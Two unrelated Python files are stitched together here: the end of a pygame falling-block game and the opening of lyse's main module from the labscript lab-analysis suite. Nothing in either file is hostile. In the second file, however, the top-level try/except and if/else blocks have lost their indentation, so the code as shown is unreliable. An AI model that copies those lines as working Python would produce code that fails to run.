        reports.clear()
        return True
    def decode_board(report):
        """
        Decode board info from its string representation and return it.
        Board reports are of the form (game_ID, encoded_board).
        Encoded boards are strings with each line separated by ':'.
        Return (game_ID, decoded_board)
        """
        # Separate the lines and prep decoded with correct amount of elements
        decoded = report[1].split(':')
        for line in range(len(decoded)):
            # Decode each line/element
            new_line = list(decoded[line])
            decoded[line] = []
            for ch in new_line:
                decoded[line].append(int(ch))
        return report[0], decoded
    def end_tick():
        """
        Perform clean up tasks at the end of a tick:
        -Remove lost games from active monitoring
        -Check for win condition
        -Check gameplay tick for all local games
        """
        if len(self.games) != 1:
            # remove lost games from activity checks
            for ID in invalids:
                self.lost_range.append(ID)
                self.active_games[ID] = None
                self.remote_games[ID] = None
                self.AI_games[ID] = None
                if ID in self.active_range:
                    self.active_range.remove(ID)
                if ID in self.remote_range:
                    self.remote_range.remove(ID)
                if ID in self.AI_range:
                    self.AI_range.remove(ID)
            # winner detection: last game standing wins
            if self.is_master and len(self.games) > 1:
                if len(self.active_range) + len(self.remote_range) + len(self.AI_range) < 2:
                    for ID in range(len(self.games)):
                        if ID in self.active_range:
                            self.active_games[ID].reports.append(('winner', ID))
                        if ID in self.remote_range:
                            self.remote_games[ID].reports.append(('winner', ID))
                        if ID in self.AI_range:
                            self.AI_games[ID].reports.append(('winner', ID))
        # check for gameplay tick on all locally simulated games
        for game in self.active_games:
            if game is not None:
                game.tick()
        for game in self.AI_games:
            if game is not None:
                game.tick()
    if self.winner is None:
        # Extract reports from network queue and add them to correct game report queue
        # Consider limiting rate if performance suffers
        while self.is_connected and len(network.game_updates) > 0:
            # handle oldest message
            game_ID, report = network.game_updates.popleft()
            # check whether display has been moved to relocate local games
            if game_ID < self.my_offset:
                game_ID = game_ID + self.remote_offset
            if report[0] == 'board':
                report = decode_board(report)
            self.remote_games[game_ID].reports.append(report)
        # process game reports for each type and note lost games
        invalids = []
        for game_ID in self.active_range:
            # Ghost piece management outside of game object for performance reasons
            global ghost
            if ghost:
                self.games[game_ID].ghost = self.active_games[game_ID].ghost
            if len(self.active_games[game_ID].reports) > 0:
                if not process_reports(self.active_games[game_ID].reports, game_ID, self.is_connected):
                    invalids.append(game_ID)
        for game_ID in self.remote_range:
            if len(self.remote_games[game_ID].reports) > 0:
                if not process_reports(self.remote_games[game_ID].reports, game_ID, False):
                    invalids.append(game_ID)
        for game_ID in self.AI_range:
            if len(self.AI_games[game_ID].reports) > 0:
                if not process_reports(self.AI_games[game_ID].reports, game_ID, self.is_connected):
                    invalids.append(game_ID)
        end_tick()
    else:
        # Game over, we have a winner: show the result, then main menu
        time.sleep(3)
        self.next = MainScreen()
        pygame.event.clear()
def process_AI(self):
    """
    Drive the AI boards: apply finished worker results, drop pieces whose
    timer expired, and queue fresh work for the workers.

    Uses self.ready_games as the per-game drop timer, AI_ready_queue for
    results coming back from workers and AI_todo_queue for outgoing work.
    """
    timestamp = time.process_time()
    # Apply every finished worker result and restart that game's timer
    while not AI_ready_queue.empty():
        board_ID, shape, column = AI_ready_queue.get()
        if board_ID in self.lost_range:
            continue
        board = self.AI_games[board_ID]
        board.unsafe_move_to(shape, board.piece_row, column)
        self.ready_games[board_ID] = timestamp
    # Drop the piece on every AI board whose timer has expired
    expired = [
        board_ID
        for board_ID, due in self.ready_games.items()
        if board_ID not in self.lost_range and timestamp - due > 2
    ]
    for board_ID in expired:
        self.AI_games[board_ID].drop()
    # Hand the workers the data needed for each dropped board's next move
    for board_ID in expired:
        del self.ready_games[board_ID]
        board = self.AI_games[board_ID]
        AI_todo_queue.put((board_ID, board.board, board.piece.piece_data, board.piece_row))
def play_next_song(menu=False):
    """
    Load and play the next track: the menu theme when menu is True,
    otherwise rotate the playlist and play its new head. An empty
    playlist is tolerated (play is still called on whatever is loaded).
    """
    global song_list
    music_player = pygame.mixer.music
    if menu:
        music_player.load(menu_music)
    else:
        try:
            head, rest = song_list[0], song_list[1:]
            song_list = rest + [head]
            music_player.load(song_list[0])
        except IndexError:
            pass
    music_player.play()
def play_sound_effect(effect):
    """
    Play the named sound effect ('move', 'turn', 'drop', 'store', 'punish').

    Sounds are decoded once on first use and cached on the function itself:
    the original implementation constructed a fresh pygame.mixer.Sound from
    disk on every call, which is wasteful for per-keystroke effects.
    Effects whose file path is unavailable (None) are silently skipped.
    """
    global sound_effects
    path = sound_effects[effect]
    if path is None:
        return
    cache = play_sound_effect.__dict__.setdefault('_cache', {})
    sound = cache.get(effect)
    if sound is None:
        sound = cache[effect] = pygame.mixer.Sound(path)
    sound.play()
def load_config(default=False):
    """
    Load configuration from file and apply it.

    Sets gameplay/sound globals as a side effect and returns three tuples:
    (width, height, fullscreen, max_fps, overscan),
    (port, multicast, time_to_live) and
    (menu_keys, game_keys, menu_buttons, game_buttons).

    Parameters:
        default: when True, overwrite the current configuration with the
            shipped defaults before loading.
    """
    def reset_config():
        """
        Overwrite current configuration with default.
        Falls back to reading the default file in place when it cannot be
        copied; quits the game when no default exists either.
        """
        try:
            from shutil import copyfile
            copyfile('default_configuration', 'configuration.txt')
            return 'configuration.txt'
        except Exception:
            try:
                with open('default_configuration', encoding='utf-8'):
                    return 'default_configuration'
            except FileNotFoundError:
                quit_game()
    if default:
        config_file = reset_config()
    else:
        try:
            with open('configuration.txt', encoding='utf-8'):
                pass
        except FileNotFoundError:
            # Bug fix: the original unconditionally overwrote this with
            # 'configuration.txt' afterwards, discarding the
            # 'default_configuration' fallback reset_config() may return.
            config_file = reset_config()
        else:
            config_file = 'configuration.txt'
    import configparser
    config = configparser.ConfigParser()
    config.read(config_file)
    # Gameplay
    global run_AI
    run_AI = config['Gameplay'].getboolean('AI')
    global max_games
    max_games = config['Gameplay'].getint('max games')
    global ghost
    ghost = config['Gameplay'].getboolean('ghost')
    # Video
    width = config['Video'].getint('resolution width')
    height = config['Video'].getint('resolution height')
    max_fps = config['Video'].getint('max fps')
    overscan = config['Video'].getfloat('overscan')
    fullscreen = config['Video'].getboolean('fullscreen')
    # Network
    port = config['Network'].getint('port')
    multicast = config['Network']['multicast address']
    time_to_live = config['Network'].getint('time to live')
    # input: menu key name -> action
    menu_keys = {}
    for action in config['Menu Input']:
        for key in config['Menu Input'][action].split(','):
            key = key.strip(' ')
            # key: action
            menu_keys[key] = action
    inputs = []
    game_keys = {}
    for keymap in config['Input Devices']:
        inputs.append(config['Input Devices'].getint(keymap) - 1)  # for 0 index
        for action in config[keymap]:
            for key in config[keymap][action].split(','):
                key = key.strip(' ')
                # key: (player, action); player converted to 0 index
                game_keys[key] = ((config['Input Devices'].getint(keymap) - 1), action)
    menu_buttons = {}
    for action in config['Menu Controller']:
        for button in config['Menu Controller'][action].split(','):
            button = button.strip(' ')
            menu_buttons[button] = action
    game_buttons = {}
    for action in config['Game Controller']:
        for button in config['Game Controller'][action].split(','):
            button = button.strip(' ')
            # Bug fix: this previously wrote into menu_buttons, leaving
            # game_buttons empty and polluting the menu mapping.
            game_buttons[button] = action
    # Init all joysticks available and map them to games without keyboard input
    global joysticks
    joysticks = {}
    for index in range(pygame.joystick.get_count()):
        mapped_to = index
        while mapped_to in inputs:
            mapped_to += 1
        joysticks[index] = mapped_to
        inputs.append(mapped_to)
        pygame.joystick.Joystick(index).init()
    # limit active games to amount of inputs available
    global max_actives
    max_actives = max_games
    if len(inputs) < max_games:
        max_actives = len(inputs)
    global music
    music = config['Sound'].getboolean('music')
    global players_with_sound
    players_with_sound = config['Sound'].getint('max players with sound effects')
    return (width, height, fullscreen, max_fps, overscan),\
        (port, multicast, time_to_live),\
        (menu_keys, game_keys, menu_buttons, game_buttons)
def set_up():
    """
    Call up configuration loader, set up required variables and start up
    the network thread.

    Side effects: initializes the display, the networking thread, the AI
    worker processes, the control mappings and the sound assets — all
    stored in module globals.
    """
    video_conf, network_conf, input_conf = load_config()
    # Pygame graphics
    global display
    display = graphics.Graphics(*video_conf)
    global local_players_count
    local_players_count = 1
    # Backgrounds: every file under data/backgrounds, shuffled
    global backgrounds
    base_dir = os.getcwd()
    try:
        os.chdir(os.path.join(base_dir, 'data', 'backgrounds'))
        backgrounds = [os.path.join(os.getcwd(), file) for file in glob.glob('*')]
        random.shuffle(backgrounds)
    except FileNotFoundError:
        backgrounds = None
    finally:
        os.chdir(base_dir)
    # Network configuration and threads
    global network
    network = networking.Network(*network_conf)
    global net_thread
    net_thread = threading.Thread(target=network.loop)
    net_thread.daemon = True
    net_thread.start()
    # AI processes: one worker per CPU, fed through a pair of queues
    global AI_ready_queue
    global AI_todo_queue
    CPU_count = 1
    try:
        CPU_count = max(multiprocessing.cpu_count(), CPU_count)
    except:
        # cpu_count() may be unavailable on some platforms; keep the 1 default
        pass
    AI_ready_queue = multiprocessing.SimpleQueue()
    AI_todo_queue = multiprocessing.SimpleQueue()
    for _ in range(CPU_count):
        process = multiprocessing.Process(target=ai.AI_worker, args=(AI_ready_queue, AI_todo_queue))
        process.daemon = True
        process.start()
    # Controls
    global menu_keys
    global game_keys
    global menu_buttons
    global game_buttons
    menu_keys, game_keys, menu_buttons, game_buttons = input_conf
    # Sound
    base_dir = os.getcwd()
    global music
    global song_list
    global menu_music
    song_list = []
    if music:
        try:
            os.chdir(os.path.join(base_dir, 'data', 'music'))
            # All .ogg files except the dedicated menu theme
            song_list = [os.path.join(os.getcwd(), file) for file in glob.glob('*.ogg') if file != 'menu.ogg']
            menu_music = os.path.join(os.getcwd(), 'menu.ogg')
            random.shuffle(song_list)
        except FileNotFoundError:
            music = False
        finally:
            os.chdir(base_dir)
    # effect name -> absolute .wav path (or None when unavailable)
    global sound_effects
    sound_effects = {
        'drop': None,
        'turn': None,
        'move': None,
        'punish': None,
        'store': None,
    }
    try:
        os.chdir(os.path.join(base_dir, 'data', 'sounds'))
        for effect in sound_effects:
            try:
                # NOTE(review): os.path.join cannot raise KeyError and the
                # file's existence is never checked here — a missing .wav
                # will only surface when the effect is first played; confirm
                # this is intended.
                sound_effects[effect] = os.path.join(os.getcwd(), f'{effect}.wav')
            except KeyError:
                continue
    except FileNotFoundError:
        pass
    finally:
        os.chdir(base_dir)
def quit_game():
    """
    Signal a clean exit: set the global exit flag (the main loop performs
    the actual pygame shutdown) and tell every AI worker to stop.
    """
    global exit_triggered
    exit_triggered = True
    # Send kill signal (-1 sentinel) to all AI workers
    try:
        for _ in range(max(multiprocessing.cpu_count(), 1)):
            AI_todo_queue.put(-1)
    except Exception:
        # Best effort: the queue may not exist yet if setup failed early.
        # (Narrowed from a bare except, which would also swallow
        # KeyboardInterrupt/SystemExit.)
        pass
def main():
    """
    Program entry point: initialize pygame and audio, register custom
    events, run set_up, then drive the active screen in the main loop.
    """
    # Small audio buffer for low-latency sound effects
    pygame.mixer.pre_init(44100, -16, 1, 512)
    pygame.mixer.init()
    pygame.init()
    # register custom event fired when the current song finishes
    global SONG_END
    SONG_END = pygame.USEREVENT + 1
    pygame.mixer.music.set_endevent(SONG_END)
    # Restrict the event queue to the events actually handled
    pygame.event.set_allowed([pygame.QUIT, pygame.KEYDOWN, pygame.KEYUP, pygame.JOYBUTTONUP, pygame.JOYBUTTONDOWN, pygame.JOYHATMOTION, SONG_END])
    set_up()
    active_screen = TitleScreen()
    pause_triggered = False
    global exit_triggered
    exit_triggered = False
    # main loop
    while True:
        pause_triggered = active_screen.process_input()
        if not pause_triggered and not exit_triggered:
            active_screen.process_events()
            active_screen.process_AI()
            # Screens request transitions by setting .next to the new screen
            active_screen = active_screen.next
            active_screen.update_display()
        else:
            if exit_triggered:
                pygame.quit()
                sys.exit()
            # Paused: idle briefly to avoid busy-waiting
            time.sleep(0.1)
if __name__ == '__main__':
    """GLHF"""
    main()
|
__main__.py | from __future__ import division, unicode_literals, print_function, absolute_import # Ease the transition to Python 3
import os
import labscript_utils.excepthook
try:
from labscript_utils import check_version
except ImportError:
raise ImportError('Require labscript_utils > 2.1.0')
check_version('labscript_utils', '2.10.0', '3')
# Splash screen
from labscript_utils.splash import Splash
splash = Splash(os.path.join(os.path.dirname(__file__), 'lyse.svg'))
splash.show()
splash.update_text('importing standard library modules')
# stdlib imports
import sys
import socket
import logging
import threading
import signal
import subprocess
import time
import traceback
import pprint
import ast
# 3rd party imports:
splash.update_text('importing numpy')
import numpy as np
splash.update_text('importing h5_lock and h5py')
import labscript_utils.h5_lock
import h5py
splash.update_text('importing pandas')
import pandas
splash.update_text('importing Qt')
check_version('qtutils', '2.2.2', '3.0.0')
splash.update_text('importing labscript suite modules')
check_version('labscript_utils', '2.12.4', '3')
from labscript_utils.ls_zprocess import ZMQServer, ProcessTree
import zprocess
from labscript_utils.labconfig import LabConfig, config_prefix
from labscript_utils.setup_logging import setup_logging
from labscript_utils.qtwidgets.headerview_with_widgets import HorizontalHeaderViewWithWidgets
from labscript_utils.qtwidgets.outputbox import OutputBox
import labscript_utils.shared_drive as shared_drive
from lyse.dataframe_utilities import (concat_with_padding,
get_dataframe_from_shot,
replace_with_padding)
from qtutils.qt import QtCore, QtGui, QtWidgets
from qtutils.qt.QtCore import pyqtSignal as Signal
from qtutils import inmain_decorator, inmain, UiLoader, DisconnectContextManager
from qtutils.auto_scroll_to_end import set_auto_scroll_to_end
import qtutils.icons
from labscript_utils import PY2
if PY2:
str = unicode
import Queue as queue
else:
import queue
from lyse import LYSE_DIR
process_tree = ProcessTree.instance()
# Set a meaningful name for zlock client id:
process_tree.zlock_client.set_process_name('lyse')
def set_win_appusermodel(window_id):
    """
    Register Windows AppUserModel metadata (icon, relaunch command and
    display name) for the given window so the taskbar groups it correctly.
    """
    from labscript_utils.winshell import set_appusermodel, appids, app_descriptions
    icon = os.path.join(LYSE_DIR, 'lyse.ico')
    # Relaunch via the windowed interpreter (pythonw.exe) to avoid a console
    interpreter = sys.executable.lower()
    if not interpreter.endswith('w.exe'):
        interpreter = interpreter.replace('.exe', 'w.exe')
    relaunch = ' '.join([interpreter, os.path.join(LYSE_DIR, '__main__.py')])
    set_appusermodel(window_id, appids['lyse'], icon, relaunch, app_descriptions['lyse'])
@inmain_decorator()
def error_dialog(message):
    """Show a modal warning dialog; inmain_decorator runs it in the main Qt thread."""
    QtWidgets.QMessageBox.warning(app.ui, 'lyse', message)
@inmain_decorator()
def question_dialog(message):
    """
    Ask a yes/no question in a modal dialog (run in the main Qt thread via
    inmain_decorator) and return True when the user answers Yes.
    """
    buttons = QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No
    answer = QtWidgets.QMessageBox.question(app.ui, 'lyse', message, buttons)
    return answer == QtWidgets.QMessageBox.Yes
def scientific_notation(x, sigfigs=4, mode='eng'):
    """Return a unicode string of the float x in scientific notation with
    sigfigs significant figures.

    mode 'eng' uses an SI prefix when the exponent has one, otherwise
    power-of-ten notation; mode 'exponential' always uses power-of-ten
    notation. Exponents are restricted to multiples of three.
    Raises TypeError when x is not a float.
    """
    times = u'\u00d7'
    thinspace = u'\u2009'
    hairspace = u'\u200a'
    sups = {u'-': u'\u207b',
            u'0': u'\u2070',
            u'1': u'\xb9',
            u'2': u'\xb2',
            u'3': u'\xb3',
            u'4': u'\u2074',
            u'5': u'\u2075',
            u'6': u'\u2076',
            u'7': u'\u2077',
            u'8': u'\u2078',
            u'9': u'\u2079'}
    prefixes = {
        -24: u"y",
        -21: u"z",
        -18: u"a",
        -15: u"f",
        -12: u"p",
        -9: u"n",
        -6: u"\u03bc",
        -3: u"m",
        0: u"",
        3: u"k",
        6: u"M",
        9: u"G",
        12: u"T",
        15: u"P",
        18: u"E",
        21: u"Z",
        24: u"Y"
    }
    if not isinstance(x, float):
        raise TypeError('x must be floating point number')
    if np.isnan(x) or np.isinf(x):
        return str(x)
    # Snap the exponent down to a multiple of three (engineering style)
    if x != 0:
        raw_exponent = int(np.floor(np.log10(np.abs(x))))
        exponent = int(np.floor(raw_exponent / 3) * 3)
    else:
        exponent = 0
    significand = x / 10 ** exponent
    # Round to the requested number of significant figures
    whole = int(divmod(significand, 1)[0])
    significand = round(significand, sigfigs - len(str(whole)))
    result = str(significand)
    if not exponent:
        return result
    def power_suffix():
        # '\u00d7 10^exponent' rendered with unicode superscripts
        superscript = ''.join(sups.get(char, char) for char in str(exponent))
        return thinspace + times + thinspace + '10' + superscript
    if mode == 'exponential':
        result += power_suffix()
    elif mode == 'eng':
        if exponent in prefixes:
            # Use the SI prefix when one exists for this exponent
            result += hairspace + prefixes[exponent]
        else:
            result += power_suffix()
    return result
def get_screen_geometry():
    """Return a list with one (left, top, width, height) tuple per screen."""
    desktop = qapplication.desktop()
    rects = [desktop.screenGeometry(i) for i in range(desktop.screenCount())]
    return [(r.left(), r.top(), r.width(), r.height()) for r in rects]
class WebServer(ZMQServer):
    """ZMQ request server exposing the lyse dataframe and shot submission."""

    def handler(self, request_data):
        """
        Dispatch a single request:
          'hello'                  -> handshake echo
          'get dataframe'          -> the current shots dataframe
          {'filepath': <h5 path>}  -> queue a shot file for analysis
          any other str            -> treated as a shot filepath
        Anything else gets a usage/error string.
        """
        logger.info('WebServer request: %s' % str(request_data))
        if request_data == 'hello':
            return 'hello'
        if request_data == 'get dataframe':
            # infer_objects() picks fixed datatypes for columns that are compatible with
            # fixed datatypes, dramatically speeding up pickling. It is called here
            # rather than when updating the dataframe as calling it during updating may
            # call it needlessly often, whereas it only needs to be called prior to
            # sending the dataframe to a client requesting it, as we're doing now.
            app.filebox.shots_model.infer_objects()
            return app.filebox.shots_model.dataframe
        if isinstance(request_data, dict) and 'filepath' in request_data:
            h5_filepath = shared_drive.path_to_local(request_data['filepath'])
            if isinstance(h5_filepath, bytes):
                h5_filepath = h5_filepath.decode('utf8')
            if not isinstance(h5_filepath, str):
                raise AssertionError(str(type(h5_filepath)) + ' is not str or bytes')
            app.filebox.incoming_queue.put(h5_filepath)
            return 'added successfully'
        if isinstance(request_data, str):
            # Just assume it's a filepath:
            app.filebox.incoming_queue.put(shared_drive.path_to_local(request_data))
            return "Experiment added successfully\n"
        return ("error: operation not supported. Recognised requests are:\n "
                "'get dataframe'\n 'hello'\n {'filepath': <some_h5_filepath>}")
class LyseMainWindow(QtWidgets.QMainWindow):
    # A signal to show that the window is shown and painted.
    firstPaint = Signal()
    # A signal for when the window manager has created a new window for this widget:
    newWindow = Signal(int)
    def __init__(self, *args, **kwargs):
        QtWidgets.QMainWindow.__init__(self, *args, **kwargs)
        # Whether the first paintEvent has fired yet (drives firstPaint)
        self._previously_painted = False
        # Set once the user has confirmed close and worker shutdown has begun
        self.closing = False
    def closeEvent(self, event):
        """Intercept close: confirm with the app, then wait for workers."""
        if self.closing:
            # Second pass (from delayedClose): let Qt close for real
            return QtWidgets.QMainWindow.closeEvent(self, event)
        if app.on_close_event():
            self.closing = True
            # Give workers up to two seconds to shut down before forcing close
            timeout_time = time.time() + 2
            self.delayedClose(timeout_time)
        event.ignore()
    def delayedClose(self, timeout_time):
        # Poll every 50 ms until all workers are gone or the timeout passes,
        # then re-trigger close (which now takes the self.closing fast path).
        if not all(app.workers_terminated().values()) and time.time() < timeout_time:
            QtCore.QTimer.singleShot(50, lambda: self.delayedClose(timeout_time))
        else:
            QtCore.QTimer.singleShot(0, self.close)
    def event(self, event):
        # Emit newWindow whenever the native window id changes
        result = QtWidgets.QMainWindow.event(self, event)
        if event.type() == QtCore.QEvent.WinIdChange:
            self.newWindow.emit(self.effectiveWinId())
        return result
    def paintEvent(self, event):
        # Emit firstPaint exactly once, on the first real paint
        result = QtWidgets.QMainWindow.paintEvent(self, event)
        if not self._previously_painted:
            self._previously_painted = True
            self.firstPaint.emit()
        return result
class AnalysisRoutine(object):
    """A single analysis script, run in a dedicated worker subprocess, with a
    corresponding row (active checkbox, status icon, name) in the RoutineBox
    model passed in as ``model``."""
    def __init__(self, filepath, model, output_box_port, checked=QtCore.Qt.Checked):
        self.filepath = filepath
        self.shortname = os.path.basename(self.filepath)
        self.model = model
        self.output_box_port = output_box_port
        # Local aliases for the RoutineBox column and role constants:
        self.COL_ACTIVE = RoutineBox.COL_ACTIVE
        self.COL_STATUS = RoutineBox.COL_STATUS
        self.COL_NAME = RoutineBox.COL_NAME
        self.ROLE_FULLPATH = RoutineBox.ROLE_FULLPATH
        self.error = False
        self.done = False
        self.to_worker, self.from_worker, self.worker = self.start_worker()
        # Make a row to put into the model:
        active_item = QtGui.QStandardItem()
        active_item.setCheckable(True)
        active_item.setCheckState(checked)
        info_item = QtGui.QStandardItem()
        name_item = QtGui.QStandardItem(self.shortname)
        name_item.setToolTip(self.filepath)
        # Full path stored as item data so get_row_index() can find this row:
        name_item.setData(self.filepath, self.ROLE_FULLPATH)
        self.model.appendRow([active_item, info_item, name_item])
        self.exiting = False
    def start_worker(self):
        """Launch the analysis worker subprocess and tell it which script it
        will run. Returns the (to_worker, from_worker, worker) handles."""
        # Start a worker process for this analysis routine:
        worker_path = os.path.join(LYSE_DIR, 'analysis_subprocess.py')
        child_handles = process_tree.subprocess(
            worker_path,
            output_redirection_port=self.output_box_port,
            startup_timeout=30,
        )
        to_worker, from_worker, worker = child_handles
        # Tell the worker what script it will be executing:
        to_worker.put(self.filepath)
        return to_worker, from_worker, worker
    def do_analysis(self, filepath):
        """Ask the worker to analyse the given shot file and block until it
        reports back. Returns (success, updated_data)."""
        self.to_worker.put(['analyse', filepath])
        signal, data = self.from_worker.get()
        if signal == 'error':
            return False, data
        elif signal == 'done':
            return True, data
        else:
            raise ValueError('invalid signal %s'%str(signal))
    @inmain_decorator()
    def set_status(self, status):
        """Update this routine's status icon in the model, and the done/error
        flags. ``status`` is one of 'done', 'working', 'error' or 'clear'.
        (Decorated with inmain_decorator — presumably marshalled to the main
        thread; confirm against qtutils docs.)"""
        index = self.get_row_index()
        if index is None:
            # Welp, we've just been deleted. Nothing to do here.
            return
        status_item = self.model.item(index, self.COL_STATUS)
        if status == 'done':
            status_item.setIcon(QtGui.QIcon(':/qtutils/fugue/tick'))
            self.done = True
            self.error = False
        elif status == 'working':
            status_item.setIcon(QtGui.QIcon(':/qtutils/fugue/hourglass'))
            self.done = False
            self.error = False
        elif status == 'error':
            status_item.setIcon(QtGui.QIcon(':/qtutils/fugue/exclamation'))
            self.error = True
            self.done = False
        elif status == 'clear':
            status_item.setData(None, QtCore.Qt.DecorationRole)
            self.done = False
            self.error = False
        else:
            raise ValueError(status)
    @inmain_decorator()
    def enabled(self):
        """Whether this routine's 'active' checkbox is currently checked."""
        index = self.get_row_index()
        if index is None:
            # Welp, we've just been deleted.
            return False
        enabled_item = self.model.item(index, self.COL_ACTIVE)
        return (enabled_item.checkState() == QtCore.Qt.Checked)
    def get_row_index(self):
        """Returns the row index for this routine's row in the model"""
        # Implicitly returns None if the row has been removed:
        for row in range(self.model.rowCount()):
            name_item = self.model.item(row, self.COL_NAME)
            fullpath = name_item.data(self.ROLE_FULLPATH)
            if fullpath == self.filepath:
                return row
    def restart(self):
        """Terminate the worker process and start a fresh one."""
        # TODO set status to 'restarting' or an icon or something, and gray out the item?
        self.end_child(restart=True)
    def remove(self):
        """End the child process and remove from the treeview"""
        self.end_child()
        index = self.get_row_index()
        if index is None:
            # Already gone
            return
        self.model.removeRow(index)
    def end_child(self, restart=False):
        """Politely ask the worker to quit, then poll (via QTimer, without
        blocking the main thread) for it to exit, escalating to terminate()
        and kill() after two-second deadlines. Optionally restarts a fresh
        worker afterwards."""
        self.to_worker.put(['quit', None])
        timeout_time = time.time() + 2
        self.exiting = True
        QtCore.QTimer.singleShot(50,
            lambda: self.check_child_exited(self.worker, timeout_time, kill=False, restart=restart))
    def check_child_exited(self, worker, timeout_time, kill=False, restart=False):
        """Poll for worker exit; re-invoked every 50ms via QTimer by
        end_child(). Escalation order: wait -> terminate() -> kill()."""
        worker.poll()
        if worker.returncode is None and time.time() < timeout_time:
            # Still running and deadline not yet reached; check again shortly:
            QtCore.QTimer.singleShot(50,
                lambda: self.check_child_exited(worker, timeout_time, kill, restart))
            return
        elif worker.returncode is None:
            if not kill:
                # Deadline passed: terminate, and give it two more seconds
                # before killing outright:
                worker.terminate()
                app.output_box.output('%s worker not responding.\n'%self.shortname)
                timeout_time = time.time() + 2
                QtCore.QTimer.singleShot(50,
                    lambda: self.check_child_exited(worker, timeout_time, kill=True, restart=restart))
                return
            else:
                worker.kill()
                app.output_box.output('%s worker killed\n'%self.shortname, red=True)
        elif kill:
            app.output_box.output('%s worker terminated\n'%self.shortname, red=True)
        else:
            app.output_box.output('%s worker exited cleanly\n'%self.shortname)
        # if analysis was running notify analysisloop that analysis has failed
        self.from_worker.put(('error', {}))
        if restart:
            self.to_worker, self.from_worker, self.worker = self.start_worker()
            app.output_box.output('%s worker restarted\n'%self.shortname)
        self.exiting = False
class TreeView(QtWidgets.QTreeView):
    """A QTreeView that emits a custom signal leftClicked(index) after a left
    click on a valid index, and doubleLeftClicked(index) (in addition) on
    double click."""
    # Bugfix: the docstring above was previously a bare string *after* the
    # Signal attributes, so it was not the class docstring (__doc__ was None).
    leftClicked = Signal(QtCore.QModelIndex)
    doubleLeftClicked = Signal(QtCore.QModelIndex)
    def __init__(self, *args):
        QtWidgets.QTreeView.__init__(self, *args)
        # Index under the mouse at the time of the last left-button press:
        self._pressed_index = None
        # Whether the click in progress is the second click of a double click:
        self._double_click = False
    def mousePressEvent(self, event):
        result = QtWidgets.QTreeView.mousePressEvent(self, event)
        index = self.indexAt(event.pos())
        if event.button() == QtCore.Qt.LeftButton and index.isValid():
            self._pressed_index = self.indexAt(event.pos())
        return result
    def leaveEvent(self, event):
        # Mouse left the widget mid-click: cancel any pending click state.
        result = QtWidgets.QTreeView.leaveEvent(self, event)
        self._pressed_index = None
        self._double_click = False
        return result
    def mouseDoubleClickEvent(self, event):
        # Ensure our left click event occurs regardless of whether it is the
        # second click in a double click or not
        result = QtWidgets.QTreeView.mouseDoubleClickEvent(self, event)
        index = self.indexAt(event.pos())
        if event.button() == QtCore.Qt.LeftButton and index.isValid():
            self._pressed_index = self.indexAt(event.pos())
            self._double_click = True
        return result
    def mouseReleaseEvent(self, event):
        # Only emit if the release is over the same index that was pressed,
        # like a normal button click:
        result = QtWidgets.QTreeView.mouseReleaseEvent(self, event)
        index = self.indexAt(event.pos())
        if event.button() == QtCore.Qt.LeftButton and index.isValid() and index == self._pressed_index:
            self.leftClicked.emit(index)
            if self._double_click:
                self.doubleLeftClicked.emit(index)
        self._pressed_index = None
        self._double_click = False
        return result
class RoutineBox(object):
    """Manages one list of analysis routines (singleshot or multishot): the
    treeview UI, the AnalysisRoutine instances and their worker processes,
    and the background thread that runs routines on files received from the
    filebox."""
    COL_ACTIVE = 0
    COL_STATUS = 1
    COL_NAME = 2
    ROLE_FULLPATH = QtCore.Qt.UserRole + 1
    # This data (stored in the name item) does not necessarily match
    # the position in the model. It will be set just
    # prior to sort() being called with this role as the sort data.
    # This is how we will reorder the model's rows instead of
    # using remove/insert.
    ROLE_SORTINDEX = QtCore.Qt.UserRole + 2
    def __init__(self, container, exp_config, filebox, from_filebox, to_filebox, output_box_port, multishot=False):
        self.multishot = multishot
        self.filebox = filebox
        self.exp_config = exp_config
        self.from_filebox = from_filebox
        self.to_filebox = to_filebox
        self.output_box_port = output_box_port
        self.logger = logging.getLogger('lyse.RoutineBox.%s'%('multishot' if multishot else 'singleshot'))
        loader = UiLoader()
        loader.registerCustomWidget(TreeView)
        self.ui = loader.load(os.path.join(LYSE_DIR, 'routinebox.ui'))
        container.addWidget(self.ui)
        if multishot:
            self.ui.groupBox.setTitle('Multishot routines')
        else:
            self.ui.groupBox.setTitle('Singleshot routines')
        self.model = UneditableModel()
        self.header = HorizontalHeaderViewWithWidgets(self.model)
        self.ui.treeView.setHeader(self.header)
        self.ui.treeView.setModel(self.model)
        active_item = QtGui.QStandardItem()
        active_item.setToolTip('Whether the analysis routine should run')
        status_item = QtGui.QStandardItem()
        status_item.setIcon(QtGui.QIcon(':qtutils/fugue/information'))
        status_item.setToolTip('The status of this analyis routine\'s execution')
        name_item = QtGui.QStandardItem('name')
        name_item.setToolTip('The name of the python script for the analysis routine')
        # The 'select all' checkbox lives in the header of the 'active' column:
        self.select_all_checkbox = QtWidgets.QCheckBox()
        self.select_all_checkbox.setToolTip('whether the analysis routine should run')
        self.header.setWidget(self.COL_ACTIVE, self.select_all_checkbox)
        self.header.setStretchLastSection(True)
        self.select_all_checkbox.setTristate(False)
        self.model.setHorizontalHeaderItem(self.COL_ACTIVE, active_item)
        self.model.setHorizontalHeaderItem(self.COL_STATUS, status_item)
        self.model.setHorizontalHeaderItem(self.COL_NAME, name_item)
        self.model.setSortRole(self.ROLE_SORTINDEX)
        self.ui.treeView.resizeColumnToContents(self.COL_ACTIVE)
        self.ui.treeView.resizeColumnToContents(self.COL_STATUS)
        self.ui.treeView.setColumnWidth(self.COL_NAME, 200)
        self.ui.treeView.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
        # Make the actions for the context menu:
        self.action_set_selected_active = QtWidgets.QAction(
            QtGui.QIcon(':qtutils/fugue/ui-check-box'), 'set selected routines active', self.ui)
        self.action_set_selected_inactive = QtWidgets.QAction(
            QtGui.QIcon(':qtutils/fugue/ui-check-box-uncheck'), 'set selected routines inactive', self.ui)
        self.action_restart_selected = QtWidgets.QAction(
            QtGui.QIcon(':qtutils/fugue/arrow-circle'), 'restart worker process for selected routines', self.ui)
        self.action_remove_selected = QtWidgets.QAction(
            QtGui.QIcon(':qtutils/fugue/minus'), 'Remove selected routines', self.ui)
        self.last_opened_routine_folder = self.exp_config.get('paths', 'analysislib')
        self.routines = []
        self.connect_signals()
        # Background thread that runs analysis on files from the filebox:
        self.analysis = threading.Thread(target = self.analysis_loop)
        self.analysis.daemon = True
        self.analysis.start()
    def connect_signals(self):
        """Connect all UI signals to their handlers."""
        self.ui.toolButton_add_routines.clicked.connect(self.on_add_routines_clicked)
